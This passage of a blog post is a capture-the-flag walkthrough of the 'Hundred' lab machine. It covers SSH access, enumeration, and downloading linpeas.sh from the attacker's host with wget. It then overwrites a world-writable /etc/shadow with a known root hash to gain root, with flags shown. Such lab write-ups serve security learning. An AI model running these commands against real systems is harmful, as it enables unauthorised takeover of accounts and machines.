2021 users.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ chmod 600 id_rsa.1             \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa.1\nEnter passphrase for key &#039;id_rsa.1&#039;: \nLinux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Aug  2 06:43:27 2021 from 192.168.1.51\nhmv@hundred:~$ whoami;id\nhmv\nuid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)<\/code><\/pre>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">hmv@hundred:~$ whoami;id\nhmv\nuid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\nhmv@hundred:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 hmv  hmv  4096 Aug  2  2021 .\ndrwxr-xr-x 3 root root 4096 Aug  2  2021 ..\n-rw------- 1 hmv  hmv    23 Aug  2  2021 .bash_history\n-rw-r--r-- 1 hmv  hmv   220 Aug  2  2021 .bash_logout\n-rw-r--r-- 1 hmv  hmv  3526 Aug  2  2021 .bashrc\ndrwxr-xr-x 3 hmv  hmv  4096 Aug  2  2021 .local\n-rw-r--r-- 1 hmv  hmv   807 Aug  2  2021 .profile\ndrwx------ 2 hmv  hmv  4096 Aug  2  2021 .ssh\n-rw------- 1 hmv  hmv    12 Aug  2  2021 user.txt\n-rw------- 1 hmv  hmv    53 Aug  2  2021 .Xauthority\nhmv@hundred:~$ cat user.txt \nHMV100vmyay\nhmv@hundred:~$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nhmv@hundred:~$ sudo -l\n-bash: sudo: command not found\nhmv@hundred:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nhmv:x:1000:1000:hmv,,,:\/home\/hmv:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:105:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nhmv@hundred:~$ 
cat \/etc\/shadow\ncat: \/etc\/shadow: Permission denied\nhmv@hundred:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep<\/code><\/pre>\n<h3>Uploading linpeas.sh<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.159 - - [24\/Apr\/2024 01:49:41] &quot;GET \/linpeas.sh HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\">hmv@hundred:~$ wget http:\/\/192.168.0.143:8888\/linpeas.sh\n--2024-04-24 01:49:46--  http:\/\/192.168.0.143:8888\/linpeas.sh\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 860549 (840K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh                            100%[=========================================================================&gt;] 840.38K  --.-KB\/s    in 0.03s   \n\n2024-04-24 01:49:46 (24.2 MB\/s) - \u2018linpeas.sh\u2019 saved [860549\/860549]\n\nhmv@hundred:~$ chmod +x linpeas.sh<\/code><\/pre>\n<p>Run it and look at the output:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404811.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404811.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240424135247936\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>This file (\/etc\/shadow) is writable by everyone, so it is enough to write a password entry of our own into it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ openssl passwd\nPassword: \nVerifying - Password: \n# the password is now set to root\necho &#039;root:qdbEWfKM1ov2g:18888:0:99999:7:::&#039; &gt; \/etc\/shadow<\/code><\/pre>\n<blockquote>\n<p>The \/etc\/shadow file consists of 9 fields<\/p>\n<p><strong>username:password:time of last password change:minimum number of days between password changes:maximum number of days between password changes:number of days before expiry to warn the user:number of days after password expiry until the account is disabled:account expiration date:reserved field<\/strong><\/p>\n<p><strong>Username<\/strong>: in \/etc\/shadow the username is the same as in \/etc\/passwd, which ties the user records in passwd and shadow together; this field must not be empty;<\/p>\n<p><strong>Password<\/strong> (already encrypted): if this field is x for some users, it means the user cannot log in to the system; this field must not be empty;<\/p>\n<p><strong>Time of last password change<\/strong>: the interval (in days) from January 1, 1970 to the most recent password change; you can change the password of a user with passwd 
and then look at how this field changes in \/etc\/shadow;<\/p>\n<p><strong>Minimum number of days between password changes<\/strong>: if set to 0, this feature is disabled; in other words, it is the number of days that must pass before the user can change the password; this feature is not very useful; the default value is taken from the definitions in the \/etc\/login.defs file, where PASS_MIN_DAYS defines it;<\/p>\n<p><strong>Maximum number of days between password changes:<\/strong> this lets the administrator enforce how long user passwords stay valid, which can be said to improve the security of the system; the system default is taken from the definitions in the \/etc\/login.defs file when the user is added, where PASS_MAX_DAYS defines it;<\/p>\n<p><strong>Number of days before expiry to warn the user:<\/strong> after the user logs in, the login program reminds the user that the password is about to expire; the system default is taken from the definitions in the \/etc\/login.defs file when the user is added, where PASS_WARN_AGE 
defines it;<\/p>\n<p><strong>Number of days after password expiry until the account is disabled<\/strong>: this field gives the number of days after the password expires at which the system disables the user; that is, the system no longer lets this user log in and does not show an expiry prompt either, the account is fully disabled;<\/p>\n<p><strong>Account expiration date<\/strong>: this field specifies the day on which the account expires (as a number of days since January 1, 1970); if this field is empty, the account remains usable indefinitely;<\/p>\n<p><strong>Reserved field:<\/strong> currently empty, reserved for future Linux development;<\/p>\n<\/blockquote>\n<p>Then we get the flag!!!!<\/p>\n<pre><code class=\"language-bash\">hmv@hundred:~$ su -l root\nPassword: \nroot@hundred:~# ls -la\ntotal 28\ndrwx------  3 root root 4096 Aug  2  2021 .\ndrwxr-xr-x 18 root root 4096 Aug  2  2021 ..\n-rw-------  1 root root   16 Aug  2  2021 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Aug  2  2021 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   15 Aug  2  2021 root.txt\nroot@hundred:~# cat root.txt \nHMVkeephacking<\/code><\/pre>\n<h2>Bonus<\/h2>\n<h3>Downloading FTP files<\/h3>\n<p>Use <code>mget *<\/code> to download files in bulk!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hundred Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred] \u2514\u2500$ s 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-620","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=620"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions"}],"predecessor-version":[{"id":621,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions\/621"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=620"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}